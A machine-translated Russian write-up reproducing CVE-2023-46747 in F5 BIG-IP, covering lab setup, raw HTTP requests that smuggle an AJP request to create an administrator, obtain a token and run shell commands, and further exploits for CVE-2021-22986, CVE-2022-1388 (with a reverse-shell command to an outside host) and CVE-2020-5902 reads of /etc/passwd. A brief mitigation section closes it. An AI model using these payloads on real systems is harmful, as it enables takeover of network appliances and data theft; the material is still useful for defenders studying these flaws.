CVE-2023-46747: уязвимость удаленного выполнения кода F5 BIG-IP.
CVE-2023-46747: уязвимость удаленного выполнения кода F5 BIG-IP.

Подпишитесь на нас ❤️, добавьте звездочку 🌟 и учитесь безопасности вместе! Автор: Locks_@Timeline Sec Количество слов в этой статье: 2013 г. Время чтения: 3~4 минуты. Заявление: Это только для ознакомления, пожалуйста, не используйте его в незаконных целях, в противном случае вы будете нести ответственность за последствия.

0x01 Введение

F5 BIG-IP — это усовершенствованное решение для доставки приложений и балансировки нагрузки, разработанное F5 Networks для оптимизации и защиты доступности, производительности и безопасности корпоративных приложений. Он предоставляет ключевые функции, такие как балансировка нагрузки, оптимизация производительности приложений, безопасность, высокая доступность и масштабируемость, чтобы обеспечить стабильную работу приложений и удовлетворить различные потребности бизнеса.

0x02 Обзор уязвимостей

Номер уязвимости: CVE-2023-46747.

Уязвимость вызвана несовместимыми методами обработки Apache httpd и протокола AJP, особенно уязвимостью в настроенной версии Apache httpd от F5. Злоумышленник может контролировать поток обработки запросов на внутреннем сервере, отправляя запросы, содержащие определенные заголовки «Content-Length» и «Transfer-Encoding».

Эта уязвимость позволяет при определенных условиях обойти обычную обработку запроса, что может привести к серьезным последствиям, особенно в сценариях, связанных с аутентификацией. Злоумышленник может активировать уязвимость, чтобы обойти аутентификацию, выполнить серверные функции или даже захватить сервер, объединив другие серверные уязвимости.

0x03 Затронутая версия

F5 BIG-IP <= 17.1.0 16.1.0 <= F5 BIG-IP <= 16.1.4 15.1.0 <= F5 BIG-IP <= 15.1.10 14.1.0 <= F5 BIG-IP <= 14.1.5 13.1.0 <= F5 BIG-IP <= 13.1.5

0x04 Настройка среды

Скачать онлайн через официальный сайт После регистрации аккаунта вы сможете скачать OVA.

Язык кода:javascript
копировать
https://my.f5.com/manage/s/downloads?productFamily=BIG-IP&productLine=big-ip_v15.x&version=15.1.8&container=Virtual-Edition&files=BIGIP-15.1.8-0.0.7.ALL-vmware.ova&locations=JAPAN

Я рекомендую всем взглянуть на руководства по csdn.

Язык кода:javascript
копировать
https://blog.csdn.net/ice_age1/article/details/49998059

Ознакомьтесь с вариантами здесь, это зависит от конфигурации вашего компьютера.

После запуска пароль учетной записи по умолчанию:

Язык кода:javascript
копировать
root/default

После входа вам будет предложено настроить новый пароль учетной записи. Введите старый пароль и пароль по умолчанию. Новый пароль имеет сложность пароля. Здесь вы можете установить более сложный пароль, который вы сможете запомнить.

Виртуальная машина не лицензирована. Введите «config» в режиме командной строки, чтобы открыть утилиту настройки.

Установите IP-адрес после выбора IPv4

Проверка подключения по IP-адресу

Если не помогло, можно проверить конфигурацию сетевой карты виртуальной машины.

Просто получите доступ к IP прямо в учебнике. Я выглядел дураком, оставив его в покое на долгое время. 最后netstat -pant

Язык кода:javascript
копировать
https://192.168.200.88:8443/tmui/login.jsp

После установки IP-адреса рекомендуется использовать для его сканирования инструмент сканирования портов, например nmap.

Язык кода:javascript
копировать
Ссылка: https://pan.baidu.com/s/1FdWZg9lf7dF109pLxedn7A
Код извлечения: ali4

vmdx можно объединить

Язык кода:javascript
копировать
root,admin/Admin!@#456

Вы также можете перейти к руководству по Baidu, чтобы самостоятельно активировать руководство по коду активации.

Язык кода:javascript
копировать
https://blog.csdn.net/weixin_47541459/article/details/125129161

0x05 Повторение уязвимости

Посетите URL-адрес:

Язык кода:javascript
копировать
https://192.168.200.82/tmui/login.jsp

Использовать обнаружение захвата пакетов Burp Сначала выполните первый шаг/tmui/Control/formпозвонитьuser/create.jspсуществоватьnucleiвPOCиспользуется

Язык кода:javascript
копировать
https://github.com/r4pG0r/CVE-2023-46747-POC

Создать ключевое значение

Язык кода:javascript
копировать
POST /tmui/login.jsp HTTP/1.1
Host: 192.168.200.82
Content-Type: application/x-www-form-urlencoded
Content-Length: 501


204  
?HTTP/1.1?/tmui/Control/form127.0.0.1localhostlocalhostP??Tmui-Dubbuf?BBBBBBBBBBB  
REMOTEROLE?0??localhost??admin??q_timenow=a&_timenow_before=&handler=%2ftmui%2fsystem%2fuser%2fcreate&&&form_page=%2ftmui%2fsystem%2fuser%2fcreate.jsp%3f&form_page_before=&hideObjList=&_bufvalue=eIL4RUnSwXYoPUIOGcOFx2o00Xc%3d&_bufvalue_before=&systemuser-hidden=[["Administrator","[All]"]]&systemuser-hidden_before=&name=admin&name_before=&passwd=admin789456&passwd_before=&finished=x&finished_before=?  
0

Получите значение токена через пароль учетной записи.

Язык кода:javascript
копировать
POST /mgmt/shared/authn/login HTTP/1.1
Host: 192.168.200.82
Content-Length: 46
Content-Type: application/x-www-form-urlencoded

{"username":"admin", "password":"Admin!@#456"}
Язык кода:javascript
копировать
"token":"ERFJW7T4V4VIBHG4EAYV24JPYF"

tokenЗаполнятьX-F5-Auth-Tokenсередина,пройти еще раз/mgmt/tm/util/bash выполнить команду

Язык кода:javascript
копировать
POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.200.82
Connection: keep-alive
Content-Length: 22
X-F5-Auth-Token:7F7MJFSB6G7RJSHQL4UB4DLR3B

{"command":"run","utilCmdArgs":"-c whoami"}

Дополнительные уязвимости

CVE-2021-22986
Язык кода:javascript
копировать
POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.200.82
Connection: close
Content-Length: 39
Cache-Control: max-age=0
Authorization: Basic YWRtaW46QVNhc1M=
X-F5-Auth-Token: 
Upgrade-Insecure-Requests: 1
Content-Type: application/json

{"command":"run","utilCmdArgs":"-c id"}
CVE-2022-1388

EXP:

Язык кода:javascript
копировать
https://github.com/horizon3ai/CVE-2022-1388
Язык кода:javascript
копировать
python.exe .\CVE-2022-1388.py -t 192.168.200.82 -c 'bash -i >& /dev/tcp/vps/6666 0>&1'

Также есть уязвимости типа чтения файлов и так далее.

Язык кода:javascript
копировать
[CVE-2020-5902] [http] [critical] https://192.168.200.82/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
[CVE-2020-5902] [http] [critical] https://192.168.200.82/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release
[CVE-2020-5902] [http] [critical] https://192.168.200.82/hsqldb%0a
[CVE-2021-22986] [http] [critical] https://192.168.200.82/mgmt/tm/util/bash [uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0\n]
[CVE-2022-1388] [http] [critical] https://192.168.200.82/mgmt/tm/util/bash

0x06 Как это исправить

Временный план смягчения последствий

Полностью ограничивает доступ к порталу TMUI, который позволяет администраторам настраивать и управлять сетевыми устройствами и службами F5 через веб-интерфейс, поэтому сам по себе вообще не должен быть доступен из Интернета. Включая проблему, описанную в этой статье, за последние три года на портале TMUI было зарегистрировано три уязвимости удаленного выполнения кода без аутентификации. Если вам необходимо получить к нему доступ, убедитесь, что портал TMUI доступен только из внутренней сети или VPN-соединения.

Обновление плана ремонта

Выпущены официальные патчи безопасности. Всем затронутым пользователям рекомендуется как можно скорее посетить официальный веб-сайт (https://my.f5.com/manage/s/article/K000137353), на котором представлены подробные решения по исправлению и временным мерам по смягчению последствий. устанавливать горячие обновления в соответствии с официальными рекомендациями. Патчить уязвимости.

Справочная ссылка

https://cn-sec.com/archives/2161733.html https://mp.weixin.qq.com/s/UkA0U91CEBnkO2MRLsLxxA

Рекомендуемые услуги

Исторические дыры

CVE-2022-1388

CVE-2021-22986

CVE-2020-5902

boy illustration
Неразрушающее увеличение изображений одним щелчком мыши, чтобы сделать их более четкими артефактами искусственного интеллекта, включая руководства по установке и использованию.
boy illustration
Копикодер: этот инструмент отлично работает с Cursor, Bolt и V0! Предоставьте более качественные подсказки для разработки интерфейса (создание навигационного веб-сайта с использованием искусственного интеллекта).
boy illustration
Новый бесплатный RooCline превосходит Cline v3.1? ! Быстрее, умнее и лучше вилка Cline! (Независимое программирование AI, порог 0)
boy illustration
Разработав более 10 проектов с помощью Cursor, я собрал 10 примеров и 60 подсказок.
boy illustration
Я потратил 72 часа на изучение курсорных агентов, и вот неоспоримые факты, которыми я должен поделиться!
boy illustration
Идеальная интеграция Cursor и DeepSeek API
boy illustration
DeepSeek V3 снижает затраты на обучение больших моделей
boy illustration
Артефакт, увеличивающий количество очков: на основе улучшения характеристик препятствия малым целям Yolov8 (SEAM, MultiSEAM).
boy illustration
DeepSeek V3 раскручивался уже три дня. Сегодня я попробовал самопровозглашенную модель «ChatGPT».
boy illustration
Open Devin — инженер-программист искусственного интеллекта с открытым исходным кодом, который меньше программирует и больше создает.
boy illustration
Эксклюзивное оригинальное улучшение YOLOv8: собственная разработка SPPF | SPPF сочетается с воспринимаемой большой сверткой ядра UniRepLK, а свертка с большим ядром + без расширения улучшает восприимчивое поле
boy illustration
Популярное и подробное объяснение DeepSeek-V3: от его появления до преимуществ и сравнения с GPT-4o.
boy illustration
9 основных словесных инструкций по доработке академических работ с помощью ChatGPT, эффективных и практичных, которые стоит собрать
boy illustration
Вызовите deepseek в vscode для реализации программирования с помощью искусственного интеллекта.
boy illustration
Познакомьтесь с принципами сверточных нейронных сетей (CNN) в одной статье (суперподробно)
boy illustration
50,3 тыс. звезд! Immich: автономное решение для резервного копирования фотографий и видео, которое экономит деньги и избавляет от беспокойства.
boy illustration
Cloud Native|Практика: установка Dashbaord для K8s, графика неплохая
boy illustration
Краткий обзор статьи — использование синтетических данных при обучении больших моделей и оптимизации производительности
boy illustration
MiniPerplx: новая поисковая система искусственного интеллекта с открытым исходным кодом, спонсируемая xAI и Vercel.
boy illustration
Конструкция сервиса Synology Drive сочетает проникновение в интрасеть и синхронизацию папок заметок Obsidian в облаке.
boy illustration
Центр конфигурации————Накос
boy illustration
Начинаем с нуля при разработке в облаке Copilot: начать разработку с минимальным использованием кода стало проще
boy illustration
[Серия Docker] Docker создает мультиплатформенные образы: практика архитектуры Arm64
boy illustration
Обновление новых возможностей coze | Я использовал coze для создания апплета помощника по исправлению домашних заданий по математике
boy illustration
Советы по развертыванию Nginx: практическое создание статических веб-сайтов на облачных серверах
boy illustration
Feiniu fnos использует Docker для развертывания личного блокнота Notepad
boy illustration
Сверточная нейронная сеть VGG реализует классификацию изображений Cifar10 — практический опыт Pytorch
boy illustration
Начало работы с EdgeonePages — новым недорогим решением для хостинга веб-сайтов
boy illustration
[Зона легкого облачного игрового сервера] Управление игровыми архивами
boy illustration
Развертывание SpringCloud-проекта на базе Docker и Docker-Compose